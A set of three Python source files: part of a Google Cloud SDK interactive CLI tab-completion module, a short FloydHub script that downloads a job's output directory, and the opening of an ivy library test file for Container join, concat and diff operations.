for i in range(last_arg_index):
if i >= len(self.args):
# Grow the cache.
self.args.append(CacheArg(args[i].value, None))
elif not self.ArgMatch(args, i):
self.args[i].Invalidate()
a = args[last_arg_index].value
# Extend the cache if necessary.
if last_arg_index == len(self.args):
self.args.append(CacheArg(a, completions))
# Update the last arg.
if (not self.args[last_arg_index].IsValid() or
not a.startswith(self.args[last_arg_index].prefix) or
a.endswith('/')):
if a.endswith('/'):
# Subdir completions.
if not self.args[last_arg_index].dirs:
# Default completions belong to ".".
self.args[last_arg_index].dirs[''] = (
self.args[last_arg_index].prefix,
self.args[last_arg_index].completions)
self.args[last_arg_index].dirs[a[:-1]] = (a, completions)
# Check for dir completions trying to slip by.
if completions and '/' in completions[0][:-1] and '/' not in a:
dirs = {}
for comp in completions:
if comp.endswith('/'):
comp = comp[:-1]
mark = '/'
else:
mark = ''
parts = _Split(comp)
if mark:
parts[-1] += mark
for i in range(len(parts)):
d = '/'.join(parts[:i])
if d not in dirs:
dirs[d] = []
comp = '/'.join(parts[:i + 1])
if comp.endswith(':/'):
comp += '/'
if comp not in dirs[d]:
dirs[d].append(comp)
for d, c in six.iteritems(dirs):
marked = d
if marked.endswith(':/'):
marked += '/'
self.args[last_arg_index].dirs[d] = marked, c
else:
self.args[last_arg_index].prefix = a
self.args[last_arg_index].completions = completions
# Invalidate the rest of the cache.
for i in range(last_arg_index + 1, len(self.args)):
self.args[i].Invalidate()
class Spinner(object):
"""A Spinner to show when completer takes too long to respond.
Some completer calls take too long, specially those that fetch remote
resources. An instance of this class can be used as a context manager wrapping
slow completers to get spinmarks while the completer fetches.
Attributes:
_done_loading: Boolean flag indicating whether ticker thread is working.
_set_spinner: Function reference to InteractiveCliCompleter's spinner
setter.
_spin_marks: List of unicode spinmarks to be cycled while loading.
_ticker: Thread instance that handles displaying the spinner.
_ticker_index: Integer specifying the last iteration index in _spin_marks.
_TICKER_INTERVAL: Float specifying time between ticker rotation in
milliseconds.
_ticker_length: Integer spcifying length of _spin_marks.
_TICKER_WAIT: Float specifying the wait time before ticking in milliseconds.
_TICKER_WAIT_CHECK_INTERVAL: Float specifying interval time to break wait
in milliseconds.
"""
_TICKER_INTERVAL = 100
_TICKER_WAIT = 200
_TICKER_WAIT_CHECK_INTERVAL = 10
def __init__(self, set_spinner):
self._done_loading = False
self._spin_marks = console_attr.GetConsoleAttr()\
.GetProgressTrackerSymbols().spin_marks
self._ticker = None
self._ticker_index = 0
self._ticker_length = len(self._spin_marks)
self._set_spinner = set_spinner
def _Mark(self, spin_mark):
"""Marks spin_mark on stdout and moves cursor back."""
sys.stdout.write(spin_mark + '\b')
sys.stdout.flush()
def Stop(self):
"""Erases last spin_mark and joins the ticker thread."""
self._Mark(' ')
self._done_loading = True
if self._ticker:
self._ticker.join()
def _Ticker(self):
"""Waits for _TICKER_WAIT and then starts printing the spinner."""
for _ in range(Spinner._TICKER_WAIT // Spinner._TICKER_WAIT_CHECK_INTERVAL):
time.sleep(Spinner._TICKER_WAIT_CHECK_INTERVAL/1000.0)
if self._done_loading:
break
while not self._done_loading:
spin_mark = self._spin_marks[self._ticker_index]
self._Mark(spin_mark)
self._ticker_index = (self._ticker_index + 1) % self._ticker_length
time.sleep(Spinner._TICKER_INTERVAL/1000.0)
def __enter__(self):
self._set_spinner(self)
self._ticker = threading.Thread(target=self._Ticker)
self._ticker.start()
return self
def __exit__(self, *args):
self.Stop()
self._set_spinner(None)
def _NameSpaceDict(args):
"""Returns a namespace dict given parsed CLI tree args."""
namespace = {}
name = None
for arg in args:
if arg.token_type == parser.ArgTokenType.POSITIONAL:
name = arg.tree.get(parser.LOOKUP_NAME)
value = arg.value
elif arg.token_type == parser.ArgTokenType.FLAG:
name = arg.tree.get(parser.LOOKUP_NAME)
if name:
if name.startswith('--'):
name = name[2:]
name = name.replace('-', '_')
continue
elif not name:
continue
elif arg.token_type == parser.ArgTokenType.FLAG_ARG:
value = arg.value
else:
continue
namespace[name] = value
return namespace
class ModuleCache(object):
"""A local completer module cache item to minimize intra-command latency.
Some CLI tree positionals and flag values have completers that are specified
by module paths. These path strings point to a completer method or class that
can be imported at run-time. The ModuleCache keeps track of modules that have
already been imported, the most recent completeion result, and a timeout for
the data. This saves on import lookup, and more importantly, repeated
completion requests within a short window. Users really love that TAB key.
Attributes:
_TIMEOUT: Newly updated choices stale after this many seconds.
completer_class: The completer class.
coshell: The coshell object.
choices: The cached choices.
stale: choices stale after this time.
"""
_TIMEOUT = 60
def __init__(self, completer_class):
self.completer_class = completer_class
self.choices = None
self.stale = 0
self.timeout = ModuleCache._TIMEOUT
class InteractiveCliCompleter(completion.Completer):
"""A prompt_toolkit interactive CLI completer.
This is the wrapper class for the get_completions() callback that is
called when characters are added to the default input buffer. It's a bit
hairy because it maintains state between calls to avoid duplicate work,
especially for completer calls of unknown cost.
cli.command_count is a serial number that marks the current command line in
progress. Some of the cached state is reset when get_completions() detects
that it has changed.
Attributes:
cli: The interactive CLI object.
coshell: The interactive coshell object.
debug: The debug object.
empty: Completion request is on an empty arg if True.
hidden: Complete hidden commands and flags if True.
last: The last character before the cursor in the completion request.
manpage_generator: The unknown command man page generator object.
module_cache: The completer module path cache object.
parsed_args: The parsed args namespace passed to completer modules.
parser: The interactive parser object.
prefix_completer_command_count: If this is equal to cli.command_count then
command PREFIX TAB completion is enabled. This completion searches PATH
for executables matching the current PREFIX token. It's fairly expensive
and volumninous, so we don't want to do it for every completion event.
_spinner: Private instance of Spinner used for loading during
ArgCompleter.
"""
def __init__(self, cli=None, coshell=None, debug=None,
interactive_parser=None, args=None, hidden=False,
manpage_generator=True):
self.arg_cache = CompletionCache(self)
self.cli = cli
self.coshell = coshell
self.debug = debug
self.hidden = hidden
self.manpage_generator = manpage_generator
self.module_cache = {}
self.parser = interactive_parser
self.parsed_args = args
self.empty = False
self._spinner = None
self.last = ''
generate_cli_trees.CliTreeGenerator.MemoizeFailures(True)
self.reset()
def reset(self):
"""Resets any cached state for the current command being composed."""
self.DisableExecutableCompletions()
if self._spinner:
self._spinner.Stop()
self._spinner = None
def SetSpinner(self, spinner):
"""Sets and Unsets current spinner object."""
self._spinner = spinner
def DoExecutableCompletions(self):
"""Returns True if command prefix args should use executable completion."""
return self.prefix_completer_command_count == self.cli.command_count
def DisableExecutableCompletions(self):
"""Disables command prefix arg executable completion."""
self.prefix_completer_command_count = _INVALID_COMMAND_COUNT
def EnableExecutableCompletions(self):
"""Enables command prefix arg executable completion."""
self.prefix_completer_command_count = self.cli.command_count
def IsPrefixArg(self, args):
"""Returns True if the input buffer cursor is in a command prefix arg."""
return not self.empty and args[-1].token_type == parser.ArgTokenType.PREFIX
def IsSuppressed(self, info):
"""Returns True if the info for a command, group or flag is hidden."""
if self.hidden:
return info.get(parser.LOOKUP_NAME, '').startswith('--no-')
return info.get(parser.LOOKUP_IS_HIDDEN)
def get_completions(self, doc, event):
"""Yields the completions for doc.
Args:
doc: A Document instance containing the interactive command line to
complete.
event: The CompleteEvent that triggered this completion.
Yields:
Completion instances for doc.
"""
self.debug.tabs.count().text('@{}:{}'.format(
self.cli.command_count,
'explicit' if event.completion_requested else 'implicit'))
# TAB on empty line toggles command PREFIX executable completions.
if not doc.text_before_cursor and event.completion_requested:
if self.DoExecutableCompletions():
self.DisableExecutableCompletions()
else:
self.EnableExecutableCompletions()
return
# Parse the arg types from the input buffer.
args = self.parser.ParseCommand(doc.text_before_cursor)
if not args:
return
# The default completer order.
completers = (
self.CommandCompleter,
self.FlagCompleter,
self.PositionalCompleter,
self.InteractiveCompleter,
)
# Command PREFIX token may need a different order.
if self.IsPrefixArg(args) and (
self.DoExecutableCompletions() or event.completion_requested):
completers = (self.InteractiveCompleter,)
self.last = doc.text_before_cursor[-1] if doc.text_before_cursor else ''
self.empty = self.last.isspace()
self.event = event
self.debug.last.text(self.last)
self.debug.tokens.text(_PrettyArgs(args))
# Apply the completers in order stopping at the first one that does not
# return None.
for completer in completers:
choices, offset = completer(args)
if choices is None:
continue
self.debug.tag(completer.__name__).count().text(len(list(choices)))
if offset is None:
# The choices are already completion.Completion objects.
for choice in choices:
yield choice
else:
for choice in sorted(choices):
yield completion.Completion(choice, start_position=offset)
return
def CommandCompleter(self, args):
"""Returns the command/group completion choices for args or None.
Args:
args: The CLI tree parsed command args.
Returns:
(choices, offset):
choices - The list of completion strings or None.
offset - The completion prefix offset.
"""
arg = args[-1]
if arg.value.startswith('-'):
# A flag, not a command.
return None, 0
elif self.IsPrefixArg(args):
# The root command name arg ("argv[0]"), the first token at the beginning
# of the command line or the next token after a shell statement separator.
node = self.parser.root
prefix = arg.value
elif arg.token_type in (parser.ArgTokenType.COMMAND,
parser.ArgTokenType.GROUP) and not self.empty:
# A command/group with an exact CLI tree match. It could also be a prefix
# of other command/groups, so fallthrough to default choices logic.
node = args[-2].tree if len(args) > 1 else self.parser.root
prefix = arg.value
elif arg.token_type == parser.ArgTokenType.GROUP:
# A command group with an exact CLI tree match.
if not self.empty:
return [], 0
node = arg.tree
prefix = ''
elif arg.token_type == parser.ArgTokenType.UNKNOWN:
# Unknown command arg type.
prefix = arg.value
if (self.manpage_generator and not prefix and
len(args) == 2 and args[0].value):
node = generate_cli_trees.LoadOrGenerate(args[0].value,
allow_extensions=True)
if not node:
return None, 0
self.parser.root[parser.LOOKUP_COMMANDS][args[0].value] = node
elif len(args) > 1 and args[-2].token_type == parser.ArgTokenType.GROUP:
node = args[-2].tree
else:
return None, 0
else:
# Don't know how to complete this arg.
return None, 0
choices = [k for k, v in six.iteritems(node[parser.LOOKUP_COMMANDS])
if k.startswith(prefix) and not self.IsSuppressed(v)]
if choices:
return choices, -len(prefix)
return None, 0
def ArgCompleter(self, args, arg, value):
"""Returns the flag or positional completion choices for arg or [].
Args:
args: The CLI tree parsed command args.
arg: The flag or positional argument.
value: The (partial) arg value.
Returns:
(choices, offset):
choices - The list of completion strings or None.
offset - The completion prefix offset.
"""
choices = arg.get(parser.LOOKUP_CHOICES)
if choices:
# static choices
return [v for v in choices if v.startswith(value)], -len(value)
if not value and not self.event.completion_requested:
return [], 0
module_path = arg.get(parser.LOOKUP_COMPLETER)
if not module_path:
return [], 0
# arg with a completer
cache = self.module_cache.get(module_path)
if not cache:
cache = ModuleCache(module_util.ImportModule(module_path))
self.module_cache[module_path] = cache
prefix = value
if not isinstance(cache.completer_class, type):
cache.choices = cache.completer_class(prefix=prefix)
elif cache.stale < time.time():
old_dict = self.parsed_args.__dict__
self.parsed_args.__dict__ = {}
self.parsed_args.__dict__.update(old_dict)
self.parsed_args.__dict__.update(_NameSpaceDict(args))
completer = parser_completer.ArgumentCompleter(
cache.completer_class,
parsed_args=self.parsed_args)
with Spinner(self.SetSpinner):
cache.choices = completer(prefix='')
self.parsed_args.__dict__ = old_dict
cache.stale = time.time() + cache.timeout
if arg.get(parser.LOOKUP_TYPE) == 'list':
parts = value.split(',')
prefix = parts[-1]
if not cache.choices:
return [], 0
return [v for v in cache.choices if v.startswith(prefix)], -len(prefix)
def FlagCompleter(self, args):
"""Returns the flag completion choices for args or None.
Args:
args: The CLI tree parsed command args.
Returns:
(choices, offset):
choices - The list of completion strings or None.
offset - The completion prefix offset.
"""
arg = args[-1]
if (arg.token_type == parser.ArgTokenType.FLAG_ARG and
args[-2].token_type == parser.ArgTokenType.FLAG and
(not arg.value and self.last in (' ', '=') or
arg.value and not self.empty)):
# A flag value arg with the cursor in the value so it's OK to complete.
flag = args[-2].tree
return self.ArgCompleter(args, flag, arg.value)
elif arg.token_type == parser.ArgTokenType.FLAG:
# A flag arg with an exact CLI tree match.
if not self.empty:
# The cursor is in the flag arg. See if it's a prefix of other flags.
# Search backwards in args to find the rightmost command node.
flags = {}
for a in reversed(args):
if a.tree and parser.LOOKUP_FLAGS in a.tree:
flags = a.tree[parser.LOOKUP_FLAGS]
break
completions = [k for k, v in six.iteritems(flags)
if k != arg.value and
k.startswith(arg.value) and
not self.IsSuppressed(v)]
if completions:
completions.append(arg.value)
return completions, -len(arg.value)
# Flag completed as it.
flag = arg.tree
if flag.get(parser.LOOKUP_TYPE) != 'bool':
completions, offset = self.ArgCompleter(args, flag, '')
# Massage the completions to insert space between flag and it's value.
if not self.empty and self.last != '=':
completions = [' ' + c for c in completions]
return completions, offset
elif arg.value.startswith('-'):
# The arg is a flag prefix. Return the matching completions.
return [k for k, v in six.iteritems(arg.tree[parser.LOOKUP_FLAGS])
if k.startswith(arg.value) and
not self.IsSuppressed(v)], -len(arg.value)
return None, 0
def PositionalCompleter(self, args):
"""Returns the positional completion choices for args or None.
Args:
args: The CLI tree parsed command args.
Returns:
(choices, offset):
choices - The list of completion strings or None.
offset - The completion prefix offset.
"""
arg = args[-1]
if arg.token_type == parser.ArgTokenType.POSITIONAL:
return self.ArgCompleter(args, arg.tree, arg.value)
return None, 0
def InteractiveCompleter(self, args):
"""Returns the interactive completion choices for args or None.
Args:
args: The CLI tree parsed command args.
Returns:
(choices, offset):
choices - The list of completion strings or None.
offset - The completion prefix offset.
"""
# If the input command line ended with a space then the split command line
# must end with an empty string if it doesn't already. This instructs the
# completer to complete the next arg.
if self.empty and args[-1].value:
args = args[:]
args.append(parser.ArgToken('', parser.ArgTokenType.UNKNOWN, None))
# First check the cache.
completions = self.arg_cache.Lookup(args)
if not completions:
# Only call the coshell completer on an explicit TAB request.
prefix = self.DoExecutableCompletions() and self.IsPrefixArg(args)
if not self.event.completion_requested and not prefix:
return None, None
# Call the coshell completer and update the cache.
command = [arg.value for arg in args]
with Spinner(self.SetSpinner):
completions = self.coshell.GetCompletions(command, prefix=prefix)
self.debug.get.count()
if not completions:
return None, None
self.arg_cache.Update(args, completions)
else:
self.debug.hit.count()
last = args[-1].value
offset = -len(last)
# No dropdown for singletons so just return the original completion.
if False and len(completions) == 1 and completions[0].startswith(last):
return completions, offset
# Make path completions play nice with dropdowns. Add trailing '/' for dirs
# in the dropdown but not the completion. User types '/' to select a dir
# and ' ' to select a path.
#
# NOTE: '/' instead of os.path.sep since the coshell is bash even on Windows
chop = len(os.path.dirname(last))
uri_sep = _URI_SEP
uri_sep_index = completions[0].find(uri_sep)
if uri_sep_index > 0:
# Treat the completions as URI paths.
if not last:
chop = uri_sep_index + len(uri_sep)
# Construct the completion result list. No list comprehension here because
# MakePathCompletion() could return None.
result = []
strip_trailing_slash = len(completions) != 1
for c in completions:
path_completion = self.MakePathCompletion(
c, offset, chop, strip_trailing_slash)
if path_completion:
result.append(path_completion)
return result, None
@classmethod
def MakePathCompletion(cls, value, offset, chop, strip_trailing_slash=True):
"""Returns the Completion object for a file/uri path completion value.
Args:
value: The file/path completion value string.
offset: The Completion object offset used for dropdown display.
chop: The minimum number of chars to chop from the dropdown items.
strip_trailing_slash: Strip trailing '/' if True.
Returns:
The Completion object for a file path completion value or None if the
chopped/stripped value is empty.
"""
display = value
if chop:
display = display[chop:].lstrip('/')
if not display:
return None
if strip_trailing_slash and not value.endswith(_URI_SEP):
value = value.rstrip('/')
if not value:
return None
return completion.Completion(value, display=display, start_position=offset)
|
get_dir.py
|
#!/usr/bin/env python3
"""
Download the specified directory from the specified job's output files.
"""
import argparse
import os
import os.path as osp
import subprocess
import time
from multiprocessing import Process
def getfile(f):
dirname = osp.dirname(f)
os.makedirs(dirname, exist_ok=True)
print("Downloading {}...".format(f))
cmd = "floyd data getfile {}/output {}".format(args.job_id, f)
subprocess.check_output(cmd.split())
os.rename(osp.basename(f), osp.join(dirname, osp.basename(f)))
parser = argparse.ArgumentParser()
parser.add_argument("job_id")
parser.add_argument("dir")
args = parser.parse_args()
print("Listing files...")
cmd = "floyd data listfiles {}/output".format(args.job_id)
allfiles = subprocess.check_output(cmd.split()).decode().split('\n')
dirfiles = [f for f in allfiles if f.startswith(args.dir + '/')]
dirfiles = [f for f in dirfiles if not f.endswith('/')]
for f in dirfiles:
Process(target=getfile, args=(f, )).start()
time.sleep(0.5)
|
test_container.py
|
# global
import os
import queue
import pytest
import random
import numpy as np
import multiprocessing
import pickle
# local
import ivy
from ivy.container import Container
import ivy_tests.test_ivy.helpers as helpers
def test_container_list_join(device, call):
container_0 = Container(
{
"a": [ivy.array([1], device=device)],
"b": {
"c": [ivy.array([2], device=device)],
"d": [ivy.array([3], device=device)],
},
}
)
container_1 = Container(
{
"a": [ivy.array([4], device=device)],
"b": {
"c": [ivy.array([5], device=device)],
"d": [ivy.array([6], device=device)],
},
}
)
container_list_joined = ivy.Container.list_join([container_0, container_1])
assert np.allclose(ivy.to_numpy(container_list_joined["a"][0]), np.array([1]))
assert np.allclose(ivy.to_numpy(container_list_joined.a[0]), np.array([1]))
assert np.allclose(ivy.to_numpy(container_list_joined["b"]["c"][0]), np.array([2]))
assert np.allclose(ivy.to_numpy(container_list_joined.b.c[0]), np.array([2]))
assert np.allclose(ivy.to_numpy(container_list_joined["b"]["d"][0]), np.array([3]))
assert np.allclose(ivy.to_numpy(container_list_joined.b.d[0]), np.array([3]))
assert np.allclose(ivy.to_numpy(container_list_joined["a"][1]), np.array([4]))
assert np.allclose(ivy.to_numpy(container_list_joined.a[1]), np.array([4]))
assert np.allclose(ivy.to_numpy(container_list_joined["b"]["c"][1]), np.array([5]))
assert np.allclose(ivy.to_numpy(container_list_joined.b.c[1]), np.array([5]))
assert np.allclose(ivy.to_numpy(container_list_joined["b"]["d"][1]), np.array([6]))
assert np.allclose(ivy.to_numpy(container_list_joined.b.d[1]), np.array([6]))
def test_container_list_stack(device, call):
container_0 = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container_1 = Container(
{
"a": ivy.array([4], device=device),
"b": {
"c": ivy.array([5], device=device),
"d": ivy.array([6], device=device),
},
}
)
container_list_stacked = ivy.Container.list_stack([container_0, container_1], 0)
assert np.allclose(ivy.to_numpy(container_list_stacked["a"][0]), np.array([1]))
assert np.allclose(ivy.to_numpy(container_list_stacked.a[0]), np.array([1]))
assert np.allclose(ivy.to_numpy(container_list_stacked["b"]["c"][0]), np.array([2]))
assert np.allclose(ivy.to_numpy(container_list_stacked.b.c[0]), np.array([2]))
assert np.allclose(ivy.to_numpy(container_list_stacked["b"]["d"][0]), np.array([3]))
assert np.allclose(ivy.to_numpy(container_list_stacked.b.d[0]), np.array([3]))
assert np.allclose(ivy.to_numpy(container_list_stacked["a"][1]), np.array([4]))
assert np.allclose(ivy.to_numpy(container_list_stacked.a[1]), np.array([4]))
assert np.allclose(ivy.to_numpy(container_list_stacked["b"]["c"][1]), np.array([5]))
assert np.allclose(ivy.to_numpy(container_list_stacked.b.c[1]), np.array([5]))
assert np.allclose(ivy.to_numpy(container_list_stacked["b"]["d"][1]), np.array([6]))
assert np.allclose(ivy.to_numpy(container_list_stacked.b.d[1]), np.array([6]))
def test_container_unify(device, call):
# devices and containers
devices = list()
dev0 = device
devices.append(dev0)
conts = dict()
conts[dev0] = Container(
{
"a": ivy.array([1], device=dev0),
"b": {"c": ivy.array([2], device=dev0), "d": ivy.array([3], device=dev0)},
}
)
if "gpu" in device and ivy.num_gpus() > 1:
idx = ivy.num_gpus() - 1
dev1 = device[:-1] + str(idx)
devices.append(dev1)
conts[dev1] = Container(
{
"a": ivy.array([4], device=dev1),
"b": {
"c": ivy.array([5], device=dev1),
"d": ivy.array([6], device=dev1),
},
}
)
# test
container_unified = ivy.Container.unify(ivy.MultiDevItem(conts), dev0, "concat", 0)
assert np.allclose(ivy.to_numpy(container_unified.a[0]), np.array([1]))
assert np.allclose(ivy.to_numpy(container_unified.b.c[0]), np.array([2]))
assert np.allclose(ivy.to_numpy(container_unified.b.d[0]), np.array([3]))
if len(devices) > 1:
assert np.allclose(ivy.to_numpy(container_unified.a[1]), np.array([4]))
assert np.allclose(ivy.to_numpy(container_unified.b.c[1]), np.array([5]))
assert np.allclose(ivy.to_numpy(container_unified.b.d[1]), np.array([6]))
def test_container_concat(device, call):
container_0 = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container_1 = Container(
{
"a": ivy.array([4], device=device),
"b": {
"c": ivy.array([5], device=device),
"d": ivy.array([6], device=device),
},
}
)
container_concatenated = ivy.concat([container_0, container_1], 0)
assert np.allclose(ivy.to_numpy(container_concatenated["a"]), np.array([1, 4]))
assert np.allclose(ivy.to_numpy(container_concatenated.a), np.array([1, 4]))
assert np.allclose(ivy.to_numpy(container_concatenated["b"]["c"]), np.array([2, 5]))
assert np.allclose(ivy.to_numpy(container_concatenated.b.c), np.array([2, 5]))
assert np.allclose(ivy.to_numpy(container_concatenated["b"]["d"]), np.array([3, 6]))
assert np.allclose(ivy.to_numpy(container_concatenated.b.d), np.array([3, 6]))
# def test_container_stack(device, call):
# container_0 = Container(
# {
# "a": ivy.array([1], device=device),
# "b": {
# "c": ivy.array([2], device=device),
# "d": ivy.array([3], device=device),
# },
# }
# )
# container_1 = Container(
# {
# "a": ivy.array([4], device=device),
# "b": {
# "c": ivy.array([5], device=device),
# "d": ivy.array([6], device=device),
# },
# }
# )
# container_stacked = ivy.Container.stack([container_0, container_1], 0)
# assert np.allclose(ivy.to_numpy(container_stacked["a"]), np.array([[1], [4]]))
# assert np.allclose(ivy.to_numpy(container_stacked.a), np.array([[1], [4]]))
# assert np.allclose(ivy.to_numpy(container_stacked["b"]["c"]), np.array([[2],[5]]))
# assert np.allclose(ivy.to_numpy(container_stacked.b.c), np.array([[2], [5]]))
# assert np.allclose(ivy.to_numpy(container_stacked["b"]["d"]), np.array([[3],[6]]))
# assert np.allclose(ivy.to_numpy(container_stacked.b.d), np.array([[3], [6]]))
def test_container_combine(device, call):
container_0 = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container_1 = Container(
{
"a": ivy.array([4], device=device),
"b": {
"c": ivy.array([5], device=device),
"e": ivy.array([6], device=device),
},
}
)
container_comb = ivy.Container.combine(container_0, container_1)
assert np.equal(ivy.to_numpy(container_comb.a), np.array([4]))
assert np.equal(ivy.to_numpy(container_comb.b.c), np.array([5]))
assert np.equal(ivy.to_numpy(container_comb.b.d), np.array([3]))
assert np.equal(ivy.to_numpy(container_comb.b.e), np.array([6]))
def test_container_diff(device, call):
# all different arrays
container_0 = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container_1 = Container(
{
"a": ivy.array([4], device=device),
"b": {
"c": ivy.array([5], device=device),
"d": ivy.array([6], device=device),
},
}
)
container_diff = ivy.Container.diff(container_0, container_1)
assert np.equal(ivy.to_numpy(container_diff.a.diff_0), np.array([1]))
assert np.equal(ivy.to_numpy(container_diff.a.diff_1), np.array([4]))
assert np.equal(ivy.to_numpy(container_diff.b.c.diff_0), np.array([2]))
assert np.equal(ivy.to_numpy(container_diff.b.c.diff_1), np.array([5]))
assert np.equal(ivy.to_numpy(container_diff.b.d.diff_0), np.array([3]))
assert np.equal(ivy.to_numpy(container_diff.b.d.diff_1), np.array([6]))
container_diff_diff_only = ivy.Container.diff(
container_0, container_1, mode="diff_only"
)
assert container_diff_diff_only.to_dict() == container_diff.to_dict()
container_diff_same_only = ivy.Container.diff(
container_0, container_1, mode="same_only"
)
assert container_diff_same_only.to_dict() == {}
# some different arrays
container_0 = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container_1 = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([5], device=device),
"d": ivy.array([3], device=device),
},
}
)
container_diff = ivy.Container.diff(container_0, container_1)
assert np.equal(ivy.to_numpy(container_diff.a), np.array([1]))
assert np.equal(ivy.to_numpy(container_diff.b.c.diff_0), np.array([2]))
assert np.equal(ivy.to_numpy(container_diff.b.c.diff_1), np.array([5]))
assert np.equal(ivy.to_numpy(container_diff.b.d), np.array([3]))
container_diff_diff_only = ivy.Container.diff(
container_0, container_1, mode="diff_only"
)
assert "a" not in container_diff_diff_only
assert "b" in container_diff_diff_only
assert "c" in container_diff_diff_only["b"]
assert "d" not in container_diff_diff_only["b"]
container_diff_same_only = ivy.Container.diff(
container_0, container_1, mode="same_only"
)
assert "a" in container_diff_same_only
assert "b" in container_diff_same_only
assert "c" not in container_diff_same_only["b"]
assert "d" in container_diff_same_only["b"]
# all different keys
container_0 = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container_1 = Container(
{
"e": ivy.array([1], device=device),
"f": {
"g": ivy.array([2], device=device),
"h": ivy.array([3], device=device),
},
}
)
container_diff = ivy.Container.diff(container_0, container_1)
assert np.equal(ivy.to_numpy(container_diff.a.diff_0), np.array([1]))
assert np.equal(ivy.to_numpy(container_diff.b.diff_0.c), np.array([2]))
assert np.equal(ivy.to_numpy(container_diff.b.diff_0.d), np.array([3]))
assert np.equal(ivy.to_numpy(container_diff.e.diff_1), np.array([1]))
assert np.equal(ivy.to_numpy(container_diff.f.diff_1.g), np.array([2]))
assert np.equal(ivy.to_numpy(container_diff.f.diff_1.h), np.array([3]))
container_diff_diff_only = ivy.Container.diff(
container_0, container_1, mode="diff_only"
)
assert container_diff_diff_only.to_dict() == container_diff.to_dict()
container_diff_same_only = ivy.Container.diff(
container_0, container_1, mode="same_only"
)
assert container_diff_same_only.to_dict() == {}
# some different keys
container_0 = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container_1 = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"e": ivy.array([3], device=device),
},
}
)
container_diff = ivy.Container.diff(container_0, container_1)
assert np.equal(ivy.to_numpy(container_diff.a), np.array([1]))
assert np.equal(ivy.to_numpy(container_diff.b.c), np.array([2]))
assert np.equal(ivy.to_numpy(container_diff.b.d.diff_0), np.array([3]))
assert np.equal(ivy.to_numpy(container_diff.b.e.diff_1), np.array([3]))
container_diff_diff_only = ivy.Container.diff(
container_0, container_1, mode="diff_only"
)
assert "a" not in container_diff_diff_only
assert "b" in container_diff_diff_only
assert "c" not in container_diff_diff_only["b"]
assert "d" in container_diff_diff_only["b"]
assert "e" in container_diff_diff_only["b"]
container_diff_same_only = ivy.Container.diff(
container_0, container_1, mode="same_only"
)
assert "a" in container_diff_same_only
assert "b" in container_diff_same_only
assert "c" in container_diff_same_only["b"]
assert "d" not in container_diff_same_only["b"]
assert "e" not in container_diff_same_only["b"]
# same containers
container_0 = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container_1 = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container_diff = ivy.Container.diff(container_0, container_1)
assert np.equal(ivy.to_numpy(container_diff.a), np.array([1]))
assert np.equal(ivy.to_numpy(container_diff.b.c), np.array([2]))
assert np.equal(ivy.to_numpy(container_diff.b.d), np.array([3]))
container_diff_diff_only = ivy.Container.diff(
container_0, container_1, mode="diff_only"
)
assert container_diff_diff_only.to_dict() == {}
container_diff_same_only = ivy.Container.diff(
container_0, container_1, mode="same_only"
)
assert container_diff_same_only.to_dict() == container_diff.to_dict()
# all different strings
container_0 = Container({"a": "1", "b": {"c": "2", "d": "3"}})
container_1 = Container({"a": "4", "b": {"c": "5", "d": "6"}})
container_diff = ivy.Container.diff(container_0, container_1)
assert container_diff.a.diff_0 == "1"
assert container_diff.a.diff_1 == "4"
assert container_diff.b.c.diff_0 == "2"
assert container_diff.b.c.diff_1 == "5"
assert container_diff.b.d.diff_0 == "3"
assert container_diff.b.d.diff_1 == "6"
container_diff_diff_only = ivy.Container.diff(
container_0, container_1, mode="diff_only"
)
assert container_diff_diff_only.to_dict() == container_diff.to_dict()
container_diff_same_only = ivy.Container.diff(
container_0, container_1, mode="same_only"
)
assert container_diff_same_only.to_dict() == {}
def test_container_structural_diff(device, call):
# all different keys or shapes
container_0 = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container_1 = Container(
{
"a": ivy.array([[4]], device=device),
"b": {
"c": ivy.array([[[5]]], device=device),
"e": ivy.array([3], device=device),
},
}
)
container_diff = ivy.Container.structural_diff(container_0, container_1)
assert np.equal(ivy.to_numpy(container_diff.a.diff_0), np.array([1]))
assert np.equal(ivy.to_numpy(container_diff.a.diff_1), np.array([[4]]))
assert np.equal(ivy.to_numpy(container_diff.b.c.diff_0), np.array([2]))
assert np.equal(ivy.to_numpy(container_diff.b.c.diff_1), np.array([[[5]]]))
assert np.equal(ivy.to_numpy(container_diff.b.d.diff_0), np.array([3]))
assert np.equal(ivy.to_numpy(container_diff.b.e.diff_1), np.array([3]))
container_diff_diff_only = ivy.Container.structural_diff(
container_0, container_1, mode="diff_only"
)
assert container_diff_diff_only.to_dict() == container_diff.to_dict()
container_diff_same_only = ivy.Container.structural_diff(
container_0, container_1, mode="same_only"
)
assert container_diff_same_only.to_dict() == {}
# some different shapes
container_0 = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container_1 = Container(
{
"a": ivy.array([4], device=device),
"b": {
"c": ivy.array([[5]], device=device),
"d": ivy.array([6], device=device),
},
}
)
container_diff = ivy.Container.structural_diff(container_0, container_1)
assert np.equal(ivy.to_numpy(container_diff.a), np.array([1]))
assert np.equal(ivy.to_numpy(container_diff.b.c.diff_0), np.array([2]))
assert np.equal(ivy.to_numpy(container_diff.b.c.diff_1), np.array([5]))
